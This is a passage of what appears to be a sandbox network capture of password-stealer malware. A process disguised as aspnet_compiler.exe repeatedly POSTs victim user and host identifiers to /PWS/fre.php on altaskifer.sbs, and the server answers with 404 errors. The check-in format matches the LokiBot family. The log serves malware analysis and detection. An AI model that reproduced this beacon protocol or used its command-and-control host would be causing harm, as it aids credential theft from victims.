Apr 6, 2024 09:30:42.092147112 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:42.459868908 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAHkxWa0D4GcqfCe4DJwESRChVEDVlKcZ0KJS0e5yte2UxBEpNsEPD9GpVuVyUH4NxIP5R0MGifwSndIHskUWag%2B%2Bbt8KH9vEl2U03JoVZBvxI1iXUjv5vcIAz0QPsP39Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012f4ab24b3e3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	49821	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:42.736556053 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:42.860810995 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:43.230144024 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t46F777Fxa%2BJJh4mNZOBK4Jx3wAE%2Fwdo0%2FrJyTioFBY7bRjRndv%2FtTOQ8yLn3bajBfnaDZEK1M%2BcpZgO9t2vGbDRv0NewZb0sUFlgDSFZ9K590eDXlIlawaPrN%2BmUhQbyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012f98b9531ea-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	49822	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:43.503602982 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:43.627749920 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:43.994375944 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dNRpSdAPuYYGpHnw4NKdVL2lPXBg1kZBY9RHqmOeELLvJe3sP83uw4Qw2nXxRCnYbJon%2BWxoUuDjWgUhCcUZOlD%2BcOYSEDvkOAJKwblkr91gp1K8GpkcGs%2B5eh2MZWpbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870012fe4ba25c6c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	49823	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:44.269499063 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:44.393898010 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:44.762161970 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptBZFbctPrL1REctM6vRt6Sig%2Bhhqvr3J6Vy018vwpb5ayomFDN7O8og90oLmwrTfM7%2BbKoG5UrZZbkzKsHfZiuRYAYzDrItABZX%2BUmHd4%2FG8SXu76yOLB%2FJGjYDUZFGLg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013031fe58bff-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	49824	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:45.042074919 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:45.165846109 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:45.534812927 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oex9%2BW6WPDQPeApDG4IAFLgghVvegzK8wrsNU28csRaP1ja%2FHV%2BsXyGLcGejjxwVnWRFLrMFLAPDvHJpTtUvanFWqoeKL1%2FHhxlsIle6utu8o6Ie0nPVNTv3ApblGiQuwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001307efe3d9f5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	49825	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:45.801532984 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:45.927334070 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:46.311472893 CEST	595	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGtFyemBNG8Z9WH1MtcqYAZ8SowF0rrvh0IP0XpEoBofwMVhUxLTDJBd9LXkixRWpywK1kUVh5LbpLUeIDu9cgumV3KwtbbYQTeq9dCrJQrNoFPWtvws3d233MMJd4stBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700130cabbb742a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	49826	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:46.592041969 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:46.717474937 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:47.092871904 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT1VPKLAZeHCllT8b2aTC2Xk3ILwT0FgTuDIs4IwVLQY04KK4s0BVvkiTGmxU%2FBQ3VM1BUHLbIZQPKlNcuMuPScwIcKcjK4dXMiYLPJrTYzWrrceqbRpN6eC%2FZyU0421Lw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013119a867441-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	49827	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:47.361320972 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:47.485132933 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:47.897085905 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ozc3S4s1s5Q4uB6NzTdbfzMyScDFaE%2BNey1b0nKYQWAgooBsbmh03rs36gi05CVE4q6tPzkfBqp3A8Dp3QO8Hbq7y2afJGM%2FwGmxpiz%2BIklkrH8BJxkh8rNqVp639qy42g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013166d2c288c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	49828	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:48.181653976 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:48.306097031 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:48.690085888 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uY9vyZJlJrx0YuVyMjrl9i0JcBqDvgucGJt1HYud3nfSBXxUHDAp6pBOMNtzEJ43cLaYOKYRotE7xrqFfA%2FAWaOvtb9E9ojlwnIOy%2BgFtqA%2BxaNf1CNi%2B41s1FjzZNXG8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700131b8c582257-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	49829	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:48.957387924 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:49.081947088 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:49.472393036 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ia3qjY4I0NDb1ZYV7qdQsSHfIByuNN6DLRJhmndTGSRVsJya65QxFzbEkbPwI1zweOLLWiCnUMwhYNEHBflLWaP0B4S1FOjmtXa1AOsLLN8PO%2BHwQju6%2BVkuXAVpeujUKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013206bea5c79-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	49830	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:49.735328913 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:49.860052109 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:50.249002934 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zA5YwEC8tHXW4D0jTjw8734u8oqqER7c0u5tmG6iK6RjFGDY1ecwy45QEFwY7bl81H3TT4an64hIZjSfWjgUiO5MWDy5qwGeLb9Kp5B3XnZmlSQ8vrwBVD9U0l4Oi%2FCkYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001325395e4c1b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	49831	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:50.516268969 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:50.653028965 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:51.033349037 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD6NcVAhFU0rSXAm9VnK6XvKyy%2BBNSbye1nX%2FRObdcT%2F2lj8uhCKKQLgS2IT1M38CASB%2BBH9B9YXAB336%2Bd8Aznvx4tBC42IzU%2FU5WhXKFiaNz3UqbrqxEhowHOX5DHvvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700132a3d4b6dbb-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	49832	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:51.314444065 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:51.438863039 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:51.821953058 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmlXRJ%2F5ihBKO45ilZajU4OhuvSUmoB9939Ky3lUk6UlJftKmXy8ljNtNIyA6491G%2BfFXc9Fol2McZg53fWB6GqzbBt3opRu4izJ8C%2B11b9fFn2cQjuxd7O6eMeBAiHEyw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700132f1e075c6f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	49833	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:52.096159935 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:52.221276999 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:52.595098019 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY5GH98lW%2F0OszuKMxmacjI29F8%2BnvmeX%2B07v6j2ICmQPWTOySGByYAAiBenkYxd7nNjJqSPb9vgROQGQfCJqPm%2F1mQ6nvnRERLQJNV1U1NYUSjZYY3h6RDpYs1eJoZYpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013340e8cb3c1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	49834	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:52.865138054 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:52.989932060 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:53.373054981 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gl3VVm1kc8Yhh8U3a9Z97oKKv5Qs9WhPrGtOrgkV%2F6VPMilDIDz0WSmsgCz7ENBx2%2FawTSToARcS2VRGSSRmXfCZ%2Bxg0FnvOGBc6cPU%2BCFpiZIKyBKgwI0JLj4dmi1ygvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001338cfa7961a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	49835	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:53.641649961 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
